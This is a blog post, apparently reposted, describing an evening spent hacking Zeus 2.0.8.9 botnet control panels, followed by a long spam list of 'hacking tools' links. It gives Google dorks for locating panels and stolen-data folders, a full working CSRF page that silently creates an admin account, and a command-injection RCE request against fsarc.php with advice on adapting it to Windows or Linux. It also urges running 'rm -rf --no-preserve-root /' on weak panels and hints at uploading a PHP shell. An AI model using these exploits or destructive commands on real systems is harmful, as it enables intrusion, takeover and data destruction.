I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)
The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.
First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
- inurl:cp.php?m=login - this should be the login to the control panel
- inurl:_reports/files - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
- inurl:install/index.php - this should be deleted, but I think this is useless now.
Boring vulns found
- Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
- No password policy - admins can set up really weak passwords
- No anti brute-force - you can try to guess the admin's password. Default username is admin
- Password autocomplete enabled - boring
- Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
- No CSRF protection - except on the password change, where the old password is needed :-( boring
<html> <head> <title></title> </head> <body> <pre> This is a CSRF POC to create a new admin user in Zeus admin panels. Username: user_1392719246 Password: admin1 You might change the URL from 127.0.0.1. Redirecting in a hidden iframe in <span id="countdown">10</span> seconds. </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe> <form action="http://127.0.0.1/cp.php?m=sys_users&new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame"> <input name="name" type="hidden" value="user_1392719246" /> <input name="password" type="hidden" value="admin1" /> <input name="status" type="hidden" value="1" /> <input name="comment" type="hidden" value="PWND!" /> <input name="r_botnet_bots" type="hidden" value="1" /> <input name="r_botnet_scripts" type="hidden" value="1" /> <input name="r_botnet_scripts_edit" type="hidden" value="1" /> <input name="r_edit_bots" type="hidden" value="1" /> <input name="r_reports_db" type="hidden" value="1" /> <input name="r_reports_db_edit" type="hidden" value="1" /> <input name="r_reports_files" type="hidden" value="1" /> <input name="r_reports_files_edit" type="hidden" value="1" /> <input name="r_reports_jn" type="hidden" value="1" /> <input name="r_stats_main" type="hidden" value="1" /> <input name="r_stats_main_reset" type="hidden" value="1" /> <input name="r_stats_os" type="hidden" value="1" /> <input name="r_system_info" type="hidden" value="1" /> <input name="r_system_options" type="hidden" value="1" /> <input name="r_system_user" type="hidden" value="1" /> <input name="r_system_users" type="hidden" value="1" /> </form> <script type="text/javascript"> window.onload=function(){ var counter = 10; var interval = setInterval(function() { counter--; document.getElementById('countdown').innerHTML = counter; if (counter == 0) { redirect(); clearInterval(interval); } }, 1000); }; function redirect() { document.getElementById("csrf-form").submit(); } </script> </body> </html> - MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
- ClickJacking - really boring stuff
- Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
- SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.
Whats good news (for the C&C panel owners)
The following stuff looks good, at least some vulns were taken seriously:
- The system directory is protected with .htaccess deny from all.
- gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
- Anti XSS: the following code is used almost everywhere
return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8'); My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda. What's really bad news (for the C&C panel owners)
And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).
The vulnerable code is in system/fsarc.php:
function fsarcCreate($archive, $files){ ... $archive .= '.zip'; $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"'; exec($cli, $e, $r); } The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60 filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.
Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)
That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )
Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)
Related links
- Hacker Tools 2020
- Pentest Tools Framework
- Pentest Tools Alternative
- Hacker Tools
- Hacker Tools Linux
- Nsa Hack Tools Download
- Pentest Tools For Windows
- Github Hacking Tools
- Hacking Tools Windows 10
- Pentest Tools For Ubuntu
- Pentest Tools Apk
- Hacking Tools Online
- Hack Tools Github
- Pentest Automation Tools
- Best Hacking Tools 2020
- Hacker Tools Linux
- Hacker Tools For Pc
- Install Pentest Tools Ubuntu
- Hacker Tools For Windows
- Hack Rom Tools
- Hacking Tools Mac
- Hack Website Online Tool
- Hacker Tools 2020
- Hacks And Tools
- Pentest Tools Framework
- Best Hacking Tools 2019
- Hacking Tools Online
- How To Make Hacking Tools
- Tools For Hacker
- Android Hack Tools Github
- Wifi Hacker Tools For Windows
- Pentest Tools List
- Pentest Tools Framework
- Hacker Tool Kit
- Hacker Hardware Tools
- Hacker Tools
- How To Hack
- Hacking Tools Software
- Growth Hacker Tools
- Hacking Tools Software
- Pentest Tools Url Fuzzer
- Hacking Tools Windows
- Hacking Tools For Games
- Computer Hacker
- Top Pentest Tools
- Pentest Tools
- Hacker Tools Github
- Hack Tools For Ubuntu
- Termux Hacking Tools 2019
- Hacker Tools Hardware
- Pentest Tools Nmap
- Hacker Tools Windows
- Hack And Tools
- Hacking Apps
- Pentest Tools Windows
- Free Pentest Tools For Windows
- Best Pentesting Tools 2018
- Nsa Hack Tools
- Hacking Tools Software
- Hacking Tools For Windows 7
- Beginner Hacker Tools
- Hack And Tools
- Pentest Tools Alternative
- Hacker Tools Mac
- Growth Hacker Tools
- Hack Tools Online
- New Hacker Tools
- Beginner Hacker Tools
- Pentest Tools Bluekeep
- Hacking Tools Usb
- Ethical Hacker Tools
- Best Hacking Tools 2020
- Usb Pentest Tools
- Best Pentesting Tools 2018
- Hack Website Online Tool
- Pentest Tools Free
- Hacker Security Tools
- Hacker Security Tools
- Pentest Tools Windows
- Pentest Tools Website Vulnerability
- Top Pentest Tools
- Pentest Tools Alternative
- Usb Pentest Tools
- Hacker Tools Free
- Hacker Tools For Ios
- What Are Hacking Tools
- Hacking Tools Download
- Pentest Tools Alternative
- Hacking Tools For Mac
- Pentest Tools Linux
- Pentest Tools Alternative
- Pentest Tools For Mac
- Usb Pentest Tools
- Hacking Tools And Software
- Hack Tools Online
- Hacking Tools For Games
- Pentest Tools Apk
- Hacking Tools For Beginners
- Hacker Techniques Tools And Incident Handling
- Ethical Hacker Tools
- Tools 4 Hack
- Hacking Tools Software
- Hacker Tools Mac
- Hacker Tools 2019
- Hacker Tools For Mac
- Hacker
- Hacker Tools Apk
- Hacking Tools Kit
- Hacker Tools Github
- Pentest Tools Port Scanner
- Hacking Tools Name
- Pentest Tools Port Scanner
- Hacker Tools For Windows
- Hacking Tools Github
- Hacker Tools Mac
- Hacking Tools For Games
- Hacking Tools For Windows
- Pentest Tools Kali Linux
- Hacker Tools For Ios
- Hacking Tools Usb
- Hacker Tools Apk
- Pentest Tools Port Scanner
- Pentest Recon Tools
- Hacking Tools Usb
- Tools 4 Hack
- Hacking Tools Pc
- Tools Used For Hacking
- Hacker Tools Apk
- Hackers Toolbox
- Hacking Tools Name
- Nsa Hack Tools Download
- Hacks And Tools
- Pentest Tools Website
- Hacking Tools Pc
- Physical Pentest Tools
- Hacker
- Hacking Tools For Kali Linux
- Pentest Tools Tcp Port Scanner
- Computer Hacker
- Pentest Tools Android
- Blackhat Hacker Tools
- Kik Hack Tools
- Android Hack Tools Github
- Pentest Tools Tcp Port Scanner
- Physical Pentest Tools
- Hacker Tools For Ios
- Hacking Tools Download
- Blackhat Hacker Tools
- Pentest Automation Tools
- Hacking Tools For Kali Linux
- Hacking Tools For Kali Linux
- Hacking Tools Name
- Hacker Techniques Tools And Incident Handling
- Pentest Box Tools Download
- Pentest Tools For Ubuntu
- Physical Pentest Tools
- New Hacker Tools
- Hacking App
- Hacker Techniques Tools And Incident Handling
- Best Pentesting Tools 2018
- Nsa Hack Tools Download
- Hacking Tools 2019
- Hacking Apps
- Nsa Hack Tools Download
- Hacking Tools For Beginners
- Best Hacking Tools 2020
- Hack App
- Nsa Hack Tools Download
- Hacking Tools And Software
- Pentest Tools Find Subdomains
- Tools For Hacker
- Hacker Hardware Tools
- Hacker
- Hacking Tools For Pc
No comments:
Post a Comment